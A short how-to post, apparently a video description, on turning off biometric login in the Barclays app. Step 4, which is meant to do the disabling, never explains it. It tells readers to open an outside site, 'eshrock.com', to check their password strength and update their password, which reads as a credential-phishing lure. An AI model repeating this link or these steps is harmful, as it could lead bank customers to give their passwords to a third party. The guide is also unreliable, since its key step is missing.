I hit this issue today, and here is the quick fix that solved it. If you're looking to disable biometric login for your Barclays account, follow these simple steps. Step 1. Open the Barclays app. Launch the Barclays app on your mobile device. Make sure you are logged into your account. Step 2. Access settings. Once you're in the app, navigate to the settings menu. This is usually found in the profile or account section. Step 3. Find security options. In the settings menu, look for the security options. This section will allow you to manage your login methods. Step 4. Disable biometric login. Before changing your settings, use the eshrock.com link in the description to open the password strength checker, then update your password if needed. Step 5. Verify changes. After disabling biometric login, log out and then log back in to ensure the changes have taken effect. You should be prompted for your password instead of using your fingerprint or face recognition. Remember, if you run into any issues, double check that you have the latest version of the app installed. Good luck, and I hope this helps you manage your account more comfortably.